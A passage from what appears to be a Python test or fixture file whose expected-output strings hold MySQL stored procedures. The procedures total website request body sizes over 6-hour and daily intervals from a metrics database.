if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 78 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 72 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry15 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 78 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 72 HOUR) AND Websiteid = id limit 1);
else SET entry15 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 72 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 66 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry16 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 72 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 66 HOUR) AND Websiteid = id limit 1);
else SET entry16 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 66 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 60 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry17 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 66 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 60 HOUR) AND Websiteid = id limit 1);
else SET entry17 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 60 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 54 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry18 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 60 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 54 HOUR) AND Websiteid = id limit 1);
else SET entry18 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 54 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 48 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry19 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 54 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 48 HOUR) AND Websiteid = id limit 1);
else SET entry19 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 48 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 42 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry20 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 48 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 42 HOUR) AND Websiteid = id limit 1);
else SET entry20 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 42 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 36 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry21 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 42 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 36 HOUR) AND Websiteid = id limit 1);
else SET entry21 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 36 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 30 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry22 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 36 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 30 HOUR) AND Websiteid = id limit 1);
else SET entry22 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 30 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 24 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry23 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 30 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 24 HOUR) AND Websiteid = id limit 1);
else SET entry23 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 24 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 18 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry24 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 24 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 18 HOUR) AND Websiteid = id limit 1);
else SET entry24 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 18 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 12 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry25 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 18 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 12 HOUR) AND Websiteid = id limit 1);
else SET entry25 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 12 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 6 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry26 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 12 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 6 HOUR) AND Websiteid = id limit 1);
else SET entry26 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 6 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 0 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry27 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 6 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 0 HOUR) AND Websiteid = id limit 1);
else SET entry27 := 0;
end if;
END//
delimiter ;
"""
EXPECTED_MONTHLY_WEBSITE_GENERATE_SAMPLES_QUERIES_SIZE = """delimiter //
DROP PROCEDURE IF EXISTS get_monthly_samples_size_websites;
CREATE PROCEDURE get_monthly_samples_size_websites (
IN id INT,
OUT entry0 FLOAT,
OUT entry1 FLOAT,
OUT entry2 FLOAT,
OUT entry3 FLOAT,
OUT entry4 FLOAT,
OUT entry5 FLOAT,
OUT entry6 FLOAT,
OUT entry7 FLOAT,
OUT entry8 FLOAT,
OUT entry9 FLOAT,
OUT entry10 FLOAT,
OUT entry11 FLOAT,
OUT entry12 FLOAT,
OUT entry13 FLOAT,
OUT entry14 FLOAT,
OUT entry15 FLOAT,
OUT entry16 FLOAT,
OUT entry17 FLOAT,
OUT entry18 FLOAT,
OUT entry19 FLOAT,
OUT entry20 FLOAT,
OUT entry21 FLOAT,
OUT entry22 FLOAT,
OUT entry23 FLOAT,
OUT entry24 FLOAT,
OUT entry25 FLOAT,
OUT entry26 FLOAT,
OUT entry27 FLOAT,
OUT entry28 FLOAT,
OUT entry29 FLOAT,
OUT entry30 FLOAT,
OUT start_hour FLOAT
)
BEGIN
select DAY(now()) INTO start_hour;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 31 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 30 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry0 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 31 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 30 DAY) AND Websiteid = id limit 1);
else SET entry0 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 30 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 29 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry1 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 30 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 29 DAY) AND Websiteid = id limit 1);
else SET entry1 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 29 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 28 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry2 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 29 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 28 DAY) AND Websiteid = id limit 1);
else SET entry2 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 28 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 27 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry3 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 28 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 27 DAY) AND Websiteid = id limit 1);
else SET entry3 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 27 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 26 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry4 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 27 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 26 DAY) AND Websiteid = id limit 1);
else SET entry4 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 26 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 25 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry5 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 26 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 25 DAY) AND Websiteid = id limit 1);
else SET entry5 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 25 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 24 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry6 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 25 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 24 DAY) AND Websiteid = id limit 1);
else SET entry6 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 24 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 23 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry7 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 24 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 23 DAY) AND Websiteid = id limit 1);
else SET entry7 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 23 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 22 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry8 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 23 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 22 DAY) AND Websiteid = id limit 1);
else SET entry8 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 22 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 21 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry9 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 22 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 21 DAY) AND Websiteid = id limit 1);
else SET entry9 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 21 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 20 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry10 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 21 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 20 DAY) AND Websiteid = id limit 1);
else SET entry10 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 20 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 19 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry11 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 20 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 19 DAY) AND Websiteid = id limit 1);
else SET entry11 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 19 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 18 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry12 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 19 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 18 DAY) AND Websiteid = id limit 1);
else SET entry12 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 18 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 17 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry13 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 18 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 17 DAY) AND Websiteid = id limit 1);
else SET entry13 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 17 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 16 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry14 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 17 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 16 DAY) AND Websiteid = id limit 1);
else SET entry14 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 16 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 15 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry15 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 16 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 15 DAY) AND Websiteid = id limit 1);
else SET entry15 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 15 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 14 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry16 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 15 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 14 DAY) AND Websiteid = id limit 1);
else SET entry16 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 14 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 13 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry17 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 14 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 13 DAY) AND Websiteid = id limit 1);
else SET entry17 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 13 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 12 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry18 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 13 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 12 DAY) AND Websiteid = id limit 1);
else SET entry18 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 12 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 11 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry19 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 12 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 11 DAY) AND Websiteid = id limit 1);
else SET entry19 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 11 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 10 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry20 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 11 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 10 DAY) AND Websiteid = id limit 1);
else SET entry20 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 10 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 9 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry21 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 10 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 9 DAY) AND Websiteid = id limit 1);
else SET entry21 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 9 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 8 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry22 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 9 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 8 DAY) AND Websiteid = id limit 1);
else SET entry22 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 8 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 7 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry23 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 8 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 7 DAY) AND Websiteid = id limit 1);
else SET entry23 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 7 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 6 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry24 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 7 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 6 DAY) AND Websiteid = id limit 1);
else SET entry24 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 6 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 5 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry25 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 6 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 5 DAY) AND Websiteid = id limit 1);
else SET entry25 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 5 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 4 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry26 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 5 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 4 DAY) AND Websiteid = id limit 1);
else SET entry26 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 4 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 3 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry27 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 4 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 3 DAY) AND Websiteid = id limit 1);
else SET entry27 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 3 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 2 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry28 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 3 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 2 DAY) AND Websiteid = id limit 1);
else SET entry28 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 2 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 1 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry29 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 2 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 1 DAY) AND Websiteid = id limit 1);
else SET entry29 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 1 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 0 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry30 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 1 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 0 DAY) AND Websiteid = id limit 1);
else SET entry30 := 0;
end if;
END//
delimiter ;
"""
| 103.586667
| 251
| 0.725276
| 6,760
| 46,614
| 4.920414
| 0.019675
| 0.129758
| 0.159702
| 0.189646
| 0.996753
| 0.99513
| 0.99059
| 0.989598
| 0.988966
| 0.988966
| 0
| 0.033945
| 0.187905
| 46,614
| 449
| 252
| 103.817372
| 0.844723
| 0
| 0
| 0.587054
| 1
| 0.370536
| 0.995924
| 0.004183
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
419c69d678cc9cd2f88a6701ee1de53ff5cf1815
| 6,683
|
py
|
Python
|
